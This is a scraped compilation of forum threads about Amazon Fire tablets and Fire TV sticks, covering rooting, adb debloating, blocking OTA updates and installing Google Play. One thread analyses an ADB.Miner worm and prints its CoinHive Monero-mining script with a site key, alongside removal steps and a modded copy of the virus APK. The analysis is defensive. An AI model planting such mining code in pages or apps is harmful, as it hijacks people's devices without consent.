How to Root Fire HD 8 (7th Gen) ? - Fire HD 8 and HD 10 Q&A, Help & Troubleshooting

I just purchased a new Kindle Fire HD 8 (7th) during the Prime Day but it looks like nobody rooted it yet. Can someone help me or redirect me to a source that can help me? Thanks The OS version is 5.4.0.0

I see. I sent a mail to King Root just in case, maybe they are working on something since they "recently" updated the app to the 6th gen of Kindles. I managed to install the Playstore so I'm 75% happy with this even if the os is not an os but an ads generator :°D I guess I'll just endure

This worked for me to remove ads: Using adb shell - pm uninstall -k --user 0 com.amazon.kindle.kso

I bought one on prime day too with the stupid special offers. I called them to unsubscribe and they did it for me for free. I was thinking I would install a custom rom anyway.

this whole Fire OS concept is just dirty. When I turn the screen on I don't have a home screen but an Ad banner.. Wish I could just remove everything and start from scratch but as I said the most important features I needed were Google Play and Google Services because they are dependencies for a third-party app I'm using to read scans. Since I purchased the Kindle just for this purpose it looked silly at first the fact I could not install and use that app. I thought it didn't matter what Kindle so I just purchased the newest Kindle with the biggest screen but they are releasing a lot of newer generations of the same model

They offered a cheaper version of their tablet with ads. You bought it. That was ultimately your choice, no matter how dirty it feels.

don't push the fault on me. this bloatOS is not advertised as cheaper version anywhere on the Kindle Fire HD 8 purchase page. they advertise it as "easy to use" and "always updated with latest offers" and this is no way explicative of what I'm going to purchase. a bad OS is just a bad OS and as a customer I have the rights to move criticism

It clearly says on their page "With Special Offers" and "Without Special Offers" and just below the tablet color selection it says what special offers means and you can click to learn more. I'm not saying buying a tablet with ads is great. But you clearly had a choice to spend more to remove that. You can complain all you want, but it was ultimately a choice you made to buy the cheaper version with those ads. Not saying the OS is good and not standing behind Amazon at all. In fact, when I'm able to root mine, I'm putting a new ROM on it to make it more like Google, which I'm assuming you want to do as well.

How did you install the google play services and play store?

Sorry I use dashes to delineate - bad habit: type like this:
pm uninstall -k --user 0 com.amazon.kindle.kso
You included dash before "pm"

This worked great for me. Thanks! For those who want a more complete example, here's a Windows PowerShell session. (I already had the adb stuff installed.)
Code:
PS C:\WINDOWS\system32> adb devices
List of devices attached
* daemon not running. starting it now on port 5037 *
* daemon started successfully *
G090XXXXXXXXXXXX device
PS C:\WINDOWS\system32> adb shell
[email protected]:/ $ pm uninstall -k --user 0 com.amazon.kindle.kso
Success
[email protected]:/ $ exit
PS C:\WINDOWS\system32> adb kill-server
Then reboot the tablet.

Ditto

I used the instructions from https://forum.xda-developers.com/amazon-fire/general/how-to-install-google-play-store-fire-t3486603
Worked in generally fine, small remark: the mentioned software under note 1 (Total Commander) did not work for me - my Fire was shown as not compatible, used ES File Explorer https://www.amazon.de/ES-Mobile-File-Explorer/dp/B008K6HN8I instead.
I am however experiencing a problem when starting certain Google apps, e.g., Gmail or Inbox. The start as expected, the screen in shown with the recent emails - I even receive notifications - but immediately after the screen of the app shows for the first time, the app crashes and I am back at the Amazon launcher. Others, e.g., Chrome work without problems.
Any ideas? I already rebooted a couple of times, but nothing changing.
[Edited] I just saw that this topic is already discussed at https://forum.xda-developers.com/hd8-hd10/help/google-mail-app-crashes-time-update-t3594701 [Edited]

Hi hhiru,
I am in the same situation as you are:
I bought my Amazon Fire HD 8 (7th) during the Prime Day
Except I have not connected it directly to Internet during the boot process.
Consequently , my FIRE OS version is still 5.3.3.0 (stop updates is half the battle)
I would strongly recommend that you prevent your tablet to update itself.
Plenty of solution on this forum: Keywords = OTA or update
Here for instance
and I am about to post a new solution my self too

How can I disable automatic updates? There is no option in the updates tab in Settings
Edit: nevermind. you linked the source

Now Patched :( Amazon Fire Utility/Tool Bloat Removal

What is this? What does it do?
I've used my free time to create a noob friendly program to complete task. It can uninstall all Amazon Bloatware. It can also Install Google, Google Chrome, and Google photos. It can install Launcher hijack as well with Nova Launcher WITH widgets WORKING. This has been tested MANY times and confirmed to work on the Fire 7. This can also remove special offers
.
WARNING
I AM NOT RESPONSIBLE FOR ANY DAMAGE. A FACTORY RESET WILL UNDO ALL CHANGES MADE.
Please do not PM me. Post in the forum and quote me if you need help. This way, everybody will receive the information.
Compatibility
This is for Windows only. I have no interest whatsoever do code this for Linux. If you want to port it, go ahead!
Please use Root Junky's Super Tool to install Amazon Drivers on Windows if it isn't working for you. I didn't need to install but you may need to. Click here to download it.
Why Google Photos and Google App?
This tool will install Google Photos because the remove Amazon Bloatware option will uninstall Amazon Photos. You will be using Google Photos instead. In the Camera app, in the bottom right corner where there is a preview, if you press it, it will go right to the Google Photos app if you used the uninstall Amazon Bloat Option.
This also installs the Google App too. Why? In Nova Launcher when you press the Quick Search bar, It will go to the Google App. Only if you use the uninstall Amazon Bloat option. How? It will uninstall the Unified Search package, so it will go to the Google app.
This no longer works on Fire OS 5.4.0.1 unfortunately, the uninstall method has been patched

There has been an article featuring my tool. If you want to check it out - link is here.
https://liliputing.com/2017/07/fire-tablet-tool-makes-hacking-amazons-2017-tablets-easier.html
Also I want you to know, if you choose to remove bloat, it will remove every Amazon app exept for the Camera, meaning you will be left with Camera and Settings left on your home screen.
Works, thanks.
Few comments:
If Windows doesn't have the amazon drivers, it won't work.
Installing Google Play Services and Chrome was expected, but it also added Google Photos and Google App.
Either mention it or don't include the last two.
Also, why are you saying to re-install Google Play Services even if they've been installed before?
worked on 5.4.0.0
thanks!

I am sorry. It installes Google Photos because the camera app is still there after uninstall. It uninstalls Amazon Photos and you need a photos app to veiw the pictures you took.
It won't reinstall the Google Play apps but it will install Google for you
It installs the Google App because it removes unified search which means on Nova Launcher the Google Search bar actually goes to Google Now instead of the Amazon Search. I am sorry for not mentioning it. I will edit the post.
Thanks!!! used to install google play apps, and installed nova launcher, but the home button is broken though. I wonder if there's any fix for that...

Really? I tested this and my homebutton is fine, Are you sure you are on the Fire 5th Generation?
Check in settings > device options > and find where it says device model.
Does it say "Fire (5th Generation" without quotes? it yes, please factory reset and try again.

v5.3.2.1 tested. Work ok, but go back to original after factory reset.
Just got my 8" with 5.4.0 in the mail yesterday. Updated 9 system updates first, then used this tool.
Everything worked fine. Nova works, google playstore and apps working. No ads on the lockscreen.
The bloat removal actually removed more things than I wanted it to, so I did a factory reset and went into the bat and took out some of the apps that I wanted to stay. Works like a charm.

Keep in mind this tool doesn't actually remove system (most preinstalled) apps; it simply makes them unavailable and thus invisible to the current user. Akin to drawing the shades when you don't like the weather. The actions are reversible...albeit unlikely if OTA updates are blocked unless Amazon has another back-channel communication mechanism.

It's under settings, users in activity launcher. Something activated it and I don't know what. Perhaps it's only available before everything is disabled. Either way, I see it in the user list, but I haven't been able to activate it again or for that matter disable it. Im likely to do another reset in the next day or so now that the kinks are being worked out. Hopefully the last one for a bit.
Back to wallpapers...the permission to run live wallpapers is already active in at least my tablet, of course in the damn system. I don't get Amazon. They don't want us to use them, but give the permission to, just not the APKs. They basically consider widgets a sin, but give you the activation script in front of your face. Makes me wonder if they really are sloppy, or there's a silent revolt going on internally. Either way those are pretty lame mistakes. I wonder how they're taking this being able to disable their apps.

- this is an Amazon centric appliance - not a general purpose Android device
- 'good enough' probably comes into play (time/budget constraints)
- a minute sliver of Fire 7 owners will attempt to uninstall core Amazon apps unless it becomes bulletproof w/substantial advantages and no side effects
Love posts like this that pit a virtual army of heroic XDA script kiddies against evil Amazon engineers in an epic battle to control a dime store gizmo. Magnify the real business impact 1000X and you might score a footnote in some unread briefing.

Who ever said anything about being a hero much less anything about Amazon being evil? Dime store or 5th Avenue...what difference does it make? I believe we should have the freedom to control what we rightfully own. Whatever comes of this, or that, or whatever we do, so be it. If it makes a dozen or so people a lot happier with a product they own, and that's considered 'heroic', then ok. Call it what you like. I can't count the times I've stated this is fun for me and a learning experience.
But hey, you have a good story line in a plot that goes beyond Amazon. Sounds like something I'd want to read about anyways. It's one of many battles. Small as it may be, a win is a win.
EDIT: Amazon just customized it. Within a matter of days, we've but thrown out much of that customization. When, or if we ever get root, I'd much like to spend time actually customizing it myself. Much of it can be undone by simple edits if you know where to make them. I've learned a lot in the past week, where many of those edits can be made.

First reported by @azureru as malware in this post.

Reverse engineering it - that Test app is a variation of ADB.Miner worm that will use your device to open webview. It open single html that will mine monero using CoinHive
Code:
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('eXnvyAQwXxGV80C4fGuiRiDZiDpDaSrf',{

miner.start();
</script>
If you have uninstall the app on your Android and it kept coming back - make sure to disable adb on your Android and check for other Android devices on your network for this worm.

innovaciones said:
I can confirm that this "Test" app is actually a virus, I reverse engineering it too and when the Test apk auto starts it opens an script from a "run.html" file that have the same code that azureru posted, so this is definitely an ADB.Miner, how we got the virus? well I guess from sideloading sketchy apps, the main problem with this virus is that the Fire TV gets very slow because most of the performance is used for mining.
How we can get rid of this virus?
Well first, is there other Fire TVs or Android devices in your place? if the answer is yes then these devices could be infected too, this virus spreads using the ADB protocol so all the devices that have "ADB debugging" option enabled that are connected in your wifi network will get the virus, so is very important that you turn off "ADB debugging" in all your Android devices.
RESET TO FACTORY SETTINGS
There a several ways to get rid of this virus, the most effective way will be reseting to factory settings all your devices, and be careful next time what apk you install, and don't forget to turn off ADB debugging when not in use.
DELETE VIRUS FILES
Using ADB input these commands:
shell rm data/local/tmp/ufo.apk
shell rm data/local/tmp/lock.txt
shell rm data/local/tmp/smi
shell rm data/local/tmp/endat
shell rm data/local/tmp/nohup
uninstall com.google.time.timer
reboot
This are some of the virus files I found but I really don't know if deleting these files will be enough to disable the virus.
INSTALL MODDED VIRUS
If you don't want to reset to factory settings and all you want is to "turn off" the miner then you can install the attached APK that is a modded version from the original virus except the run.html is a blank page (without the minning script) and the Activities name from the AndroidManifest.xml were changed so it can't start now, so pretty much the virus will think it's working but it's not.
HIDE THE VIRUS
As recommended here you could try the hide command:
pm hide com.google.time.timer
Here is more information about these kind of virus, the test virus a variation from this:

I hope this information could help someone.

the test app just has a White screen, and in the top left corner has a Green Android bot and the word test.. can get a pic if needed.
o i should say, ive googled and searched and searched for info on this and apparently im the only person in the world this is happening to
ok i looked at the test app in the firewall and it has more info, it says its from, com.google.time.timer , so what does that mean? is it a file from google that messed up ??
hmmm. Ok i installed nox 6 emulater and installed all the same apps and so far this com.google.time.timer does not exist ! thought maybe i could track down some info on this if i installed it on my pc, someone got any ideas here???
ok someone has to know something here, just got off the phone with amazon tech, they told me "test" keeps popping up because i have a trial amazon account and i have to pay for amazon service !! say what?? I dont even use the firestick for amazon service !! guess its time to root and take out the amazon services then?
well so far i made a new account with my other email and deregistered my firestick off my account and put it on the new account. Let yall know what happens.
so far the test app hasent popped up at all. So according to amazon, you have to pay to just use this firestick.. i guess running there adds on the homepage to make them money isnt enough, you have to pay to keep using it. but ok, just keep making new accounts and linking the firestick to the new accounts will solve this problem i guess. So if anyone ever has this problem besides me, thats the answer ! thanks everyone.

No you don't have to pay to use the firestick - you probably signed up for free 30 day prime subscription - once that runs out it will automatically charge you for the subscription unless you cancel (if there is an available payment option on your account)
I assume all you had to do if it was prime membership was to cancel your subscription
Of course you don't have to opt in for this at all during registration
You can simply remove apps via adb
The firestick doesn't come with any Google apps (for obvious reasons) so anything else that is popping up is from something you have installed
well, after 2 days the test is popping up again ! =*( but anyway, I know i dont have any trials of anything especially prime, i had problems with Prime before and i make sure and double check i have nothing to do with prime. Amazon tech are the ones that told me if i pay 19.99 a month or 60 for 5 months it will stop ! So i have no idea what there talking about. I can only think to uninstall apps 1 by 1 and see if it stops or not. Im really getting to a loss on this and considering selling my set up on ebay and just buying one of the 100 dollar android boxes. =( thank you much for your reply !! All i can guess it is something installed, but wth is amazon talking about ? lol
talked to amazon, though my account said , you have no prime sub, sign up now! they said i had a prime sub trial ... canceled it and still get the pop up !

i signed up for an account on this message board just for this thread.
Same thing is happening to me!!
Its driving me bonkers. I did a factory reset and everything. Its an app called "test" that will re-install itself even after deletion. I've tried installing an antivirus/malware app on the firestick, but none of the apps work properly on it. How is there not a proper antivirus app for firestick yet? Seems odd.
Let's see if we can crack this thing together. I'll send you a PM as well.
Omg in not alone in the world !!!! Thank you!!!!!!!!!!
indeed ive tied many antivirus apps and one picked it up and said its a MED virus , deleted it and it reinstalled
I am also having this problem. Please let me know how you fix t. I have a prime account and Amazon is no help
I'm having the same issue. Asked on reddit and waiting on some answers.
Same here
Just started a few weeks ago. When did it start for you guys?
Same problem here, started few weeks ago, factory reset won't work, disabling ADB and untrusted sources neither, it keeps reinstalling. Maybe if it is a virus it can be hidden in the sd card?
Me too....
Both of my firesticks began having this issue recently. I also found the app called "test" that will not uninstall. It's driving me insane. It pauses video on Amazon prime every 10 minutes or so and completely exits streams if I'm using kodi. Has anyone found a solution yet?
I found a thread an Reddit but all the posts and responses had been deleted. :/
Same problem with my Firestick
I'm experiencing the exact same issue! Constant interruptions whatever I'm watching every 10 -20 mins. Blank white screen with little green android robot in upper left corner says "Test". This just recently (2-3 wks) started happening! I've been using firesticks since Nov/17. One of my firesticks recently crashed and Amazon is sending me a new one; can't wait to see if the new firestick has this "Test" crap on it too!? I'm not a Prime member, and have never accepted a trial membership either. I only use firestick for Kodi, Netflix, and Youtube videos. I don't use any of the Amazon $ services.
I'm so happy to find your post, thought I was the only one! Hopefully we can figure this out and get back to watching without interruptions! :fingers-crossed:

[EXYNOS] [BATTERY LIFE] (Possibly) longer Battery Life after degoogling.

It seems like I get longer Battery life after completely wiping everything related to Google (Including Google Play/Mobile Services) with root (I was already. It isn't worth it to root just to degoogle your phone as you can remove most google packages with tha adb shell uninstall command. But with root you can wipe every single one of them). Is this possible (I think yes as there is no Google Services running in the background all the time. No location services, no Google Play, no Mobile Services or Google Synchronization......)? Should I post a tutorial?
Your thoughts?

Hi...i don't think it makes sense to root it for that..you can disable all off with CCSWE or Package Disabler apk and enable it on again if necessary .... and as for the battery, it will certainly last a bit longer without Google service... if you already have a turorial ready, why not ...

I was already rooted. It would be really stupid to just to remove some apps as you can remove most of them with adb.

Exactly , and that's another example that doesn't need root for something like that...and that stupidity has nothing to do with this case ... anyone can do whatever they want with their device ... it was my opinion that you suggested in the OP.. [emoji6]

Play services tends to use more than it should for battery on ANY device and disabling it will definately help with battery life. The hit in battery is just the sacrifice you make to run ANY app that utilizes play services (not just google apps, and more than one would think).
I debloat and remove a lot of useless sh*t using adb appcontrol.

I think app control only disables the package. Correct me if I'm wrong.
For a full removal I recommend the adb uninstall command it goes:
adb shell pm uninstall -k --user 0 [PackageNameHere]
You can use an app like package names viewer 2.0 to get the package names
Sent from my SM-G988B using XDA Labs
I removed only the stuff that I am absolutely certain I will never need, like Facebook and kids crap. The rest is disabled via CCSWE App Manager.
You can do whatever you like. Just make a list of everything you remove, in case you need to reinstall something later.
if it is rooted, make backups of the apps with Titanium. Disabling it doesn't do much good because they will still be on the device. Crap is Crap, delete it...

As far as I understand it only removes it from user 0, the primary user, but still persists, although it´s not actiated. If an app is locked, you can´t uninstall it entirely. On the other hand, I understand that you can still make the official updates when doing it this way.

If you haven´t tried it already, try to install PCAPdroid and see how many apps are trying to connect to some server somewhere all the time without any benefit for you. Although I knew I was beeing monitored at a very detailed level, I was still shocked. Now I got it under control with NetGuard, an other app I can recommend. The paid version of NetGuard also comes with a simple network log (not straight forward to configure, but works fine). It´s some very handy tools.
The point is, of course you can save battery if you uninstall all those abusive apps that constantly uses your CPU and Internet connection. I don´t know how much, but some you can save.

Fire HD 8 - 10th Gen - 2020 Release - Notifications Issues

Hi all,
I recently purchased a Fire HD 8 10th Gen and utilized Fire Toolbox to remove some of the Amazon bloat as well as install Google Play services. I've done some research on the forums in an effort to find a solution for Google Play installed apps to successfully generate a notification, but have not been successful.
I've tried disabling the battery optimization on Google services as well as the apps I am looking to see notifications from. Any other recommendations?
Bump
Ive scoured everywhere on the internet for a solution , did not find one, please anyone help us. I really need to see my discord notifications!

Thanks. I scoured the internet for a solution to make notifications work for Play Store apps on my Fire HD 8 (2018) as well, and didn't find one.
Happy to hear about Floatify ... but just a little too late. Amazon just did a forced update of Fire OS on my tablet to version 7.3.1.6, which apparently is based on Android 9 instead of Android 7 (shocking, I've never known Amazon to do an Android base version update on a specific tablet generation in the past). And unfortunately Floatify says "not compatible with Android Oreo (8) or Android Pie (9)".

You must have disabled this Amazon's stubborn OTA updates that can't stop it:
Code:
adb shell pm disable-user com.amazon.device.software.ota
adb shell pm disable-user com.amazon.device.software.ota.override
adb shell pm disable-user com.amazon.kindle.otter.oobe.forced.ota
adb shell pm disable-user com.amazon.settings.systemupdates
I also have a Fire HD 8 (2018 model) but I have disabled an OTA updates using ADB and NoRoot Firewall (VPN firewall) to staying on Fire OS 6.3.0.1 and it's not rooted.

I did disable OS updates with the Toolbox when I first got the tablet, but apparently it didn't take, and the tablet has continued getting forced updates from Amazon.
In any case, the reason why I needed notifications from Google Play apps is so that Tasker can read them. I don't care about the visual appearance. I'm not sure Floatify would have addressed that issue.

You'll never get the full GPS notification experience on an Amazon device w/o a custom ROM. FireOS does not support the underlying framework to allow complete installation of Play Services. Hacks such Floatify are incomplete bandaids that appeal to a narrow audience. Don't get drawn in ...
so are we just doomed to never having discord or any type of notifications? notifications use to work on my old kindle fire!

Getting Playstore links to open Google Play

I have Google Play installed on my Amazon fire tablet, is it possible to make the playstore open when clicking on a web link for an app? as it usually just opens the Amazon appstore. I'm sure it used to be possible as I remember it worked a couple of years ago on my old Fire 7 tablet without having to do anything

You can disable that stupid Amazon Appstore by using ADB command (which requires a Windows/Linux computer).
Code:
adb shell pm disable-user com.amazon.venezia
